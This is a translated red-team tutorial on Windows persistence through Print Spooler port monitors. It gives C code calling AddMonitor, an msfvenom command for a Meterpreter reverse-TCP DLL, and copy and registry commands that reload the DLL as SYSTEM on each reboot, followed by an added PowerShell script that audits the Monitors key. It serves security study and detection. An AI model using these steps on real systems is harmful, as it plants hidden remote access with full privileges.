Windows persistence (ix): Port Monitors

The Spooler service is responsible for managing print jobs in the Windows operating system. Interaction with the print spooler takes place through its API and services; this API includes a function, AddMonitor, that can be used to install a local port monitor and link the monitor's configuration, data and monitor files. Because of this, the function can be used to load a DLL into the spoolsv.exe process, and by additionally creating a registry key a red team operator can achieve persistence on the system.
Brady Bloxham demonstrated this persistence technique at DEF CON 22. It should be noted that the technique requires administrator-level privileges and that the DLL must be dropped on disk. Mantvydas Baranauskas uses the following code on his website as part of his red team notes.
The Windows.h header includes Winspool.h, which Microsoft's documentation lists as the required header. The MONITOR_INFO_2 structure is used to specify the necessary monitor details:

  • pName // Monitor name
  • pEnvironment // Environment architecture
  • pDLLName // Monitor DLL file name
#include <windows.h>
#include <winspool.h>
#include <stdio.h>
#pragma comment(lib, "winspool.lib")   // AddMonitor is exported by winspool.drv; link its import library

int main() {
    MONITOR_INFO_2 monitorInfo;
    TCHAR env[12]  = TEXT("Windows x64");   // environment architecture
    TCHAR name[12] = TEXT("Monitor");       // monitor name
    TCHAR dll[12]  = TEXT("test.dll");      // monitor DLL, expected in System32
    monitorInfo.pName = name;
    monitorInfo.pEnvironment = env;
    monitorInfo.pDLLName = dll;
    // Level 2 tells AddMonitor that pMonitors points to a MONITOR_INFO_2 structure
    if (!AddMonitor(NULL, 2, (LPBYTE)&monitorInfo)) {
        printf("AddMonitor failed: %lu\n", GetLastError());
        return 1;
    }
    return 0;
}


 AddMonitor function

 Compiling the code produces an executable (in this case Monitors.exe) which, when run, registers the malicious DLL (test.dll) on the system. The Metasploit Framework can be used to generate a Meterpreter payload as a DLL file.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.2.21 LPORT=4444 -f dll > test.dll

The DLL must be copied to the System32 folder because, according to the Microsoft documentation, that is the location where the AddMonitor function expects to find the DLL in order to load it.

copy C:\Users\pentestlab\Desktop\test.dll C:\Windows\System32
Monitors.exe


 Copying the malicious DLL to System32

Monitors.exe must be located in the same folder as the malicious DLL (System32). Executing the file establishes communication with Meterpreter.


 Meterpreter – AddMonitor registers the DLL

However, to achieve persistence, a registry key is needed under the "Monitors" registry location.

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Monitors

The following command creates a registry key whose Driver value contains test.dll. Viewing the registry in the editor verifies that the key has been created.

reg add "hklm\system\currentcontrolset\control\print\monitors\Pentestlab" /v "Driver" /d "test.dll" /t REG_SZ


 Port Monitors – registry key

On the next reboot, the spoolsv.exe process loads every driver DLL listed in the Monitors registry key that is stored in the Windows System32 folder. The image below shows that the Meterpreter session has been established with the same privilege level as the Print Spooler service (SYSTEM), and that execution took place from the System32 folder (the folder where test.dll was dropped).
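The loading behaviour described above (spoolsv.exe loads each Driver DLL listed under the Monitors key from System32 at start-up) gives a defender a compact place to audit. The following PowerShell script is an added example and is not code from the original post or from the authors cited. It assumes it runs on a Windows host with rights to read HKLM and that Get-AuthenticodeSignature is available; the allow-list of built-in monitor DLLs is a constructed, illustrative subset that should be adjusted to the Windows build being audited.

```powershell
# Added example (not from the original post): audit the Print Monitors registry key
# that the technique above relies on. Assumes Windows, read access to HKLM and
# Get-AuthenticodeSignature (Windows PowerShell 5.1 or PowerShell 7 on Windows).

$monitorsKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Print\Monitors'
$system32    = Join-Path $env:SystemRoot 'System32'

# Constructed, incomplete allow-list of port monitor DLLs that ship with Windows.
# Anything not on it, or not validly signed, is worth a closer look.
$knownDrivers = @('localspl.dll', 'tcpmon.dll', 'usbmon.dll', 'win32spl.dll', 'WSDMon.dll', 'AppMon.dll')

function Get-PortMonitorAudit {
    Get-ChildItem -Path $monitorsKey -ErrorAction Stop | ForEach-Object {
        $sub    = $_
        $driver = (Get-ItemProperty -Path $sub.PSPath -Name 'Driver' -ErrorAction SilentlyContinue).Driver
        if (-not $driver) { return }          # a monitor key without a Driver value loads nothing

        # The spooler resolves a bare file name against System32, as the post describes
        $dllPath = Join-Path $system32 $driver
        $exists  = Test-Path -LiteralPath $dllPath
        $sigStatus = if ($exists) {
            (Get-AuthenticodeSignature -LiteralPath $dllPath).Status.ToString()
        } else {
            'Missing'
        }
        $isKnown = $knownDrivers -contains $driver   # -contains is case-insensitive

        [pscustomobject]@{
            Monitor    = $sub.PSChildName
            Driver     = $driver
            Path       = $dllPath
            Exists     = $exists
            Signature  = $sigStatus
            Known      = $isKnown
            Suspicious = (-not $isKnown) -or ($sigStatus -ne 'Valid')
        }
    }
}

Get-PortMonitorAudit | Sort-Object Suspicious -Descending | Format-Table -AutoSize
```

Any entry whose Driver is not on the allow-list, whose DLL is missing from System32, or whose Authenticode status is anything other than Valid is flagged as suspicious; the Pentestlab / test.dll entry from the walkthrough above would surface as unknown and unsigned. Because the monitor only survives a reboot through this registry key, the key is the durable indicator to collect, while the module list of the running spoolsv.exe process shows what is currently loaded.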


 

 Persistence via Port Monitors – Meterpreter

Translator's note: This article was compiled and translated by Bypass and is intended only for security research and learning.

Original article: https://pentestlab.blog/2019/10/28/persistence-port-monitors/

Source: www.cnblogs.com/xiaozi/p/11834481.html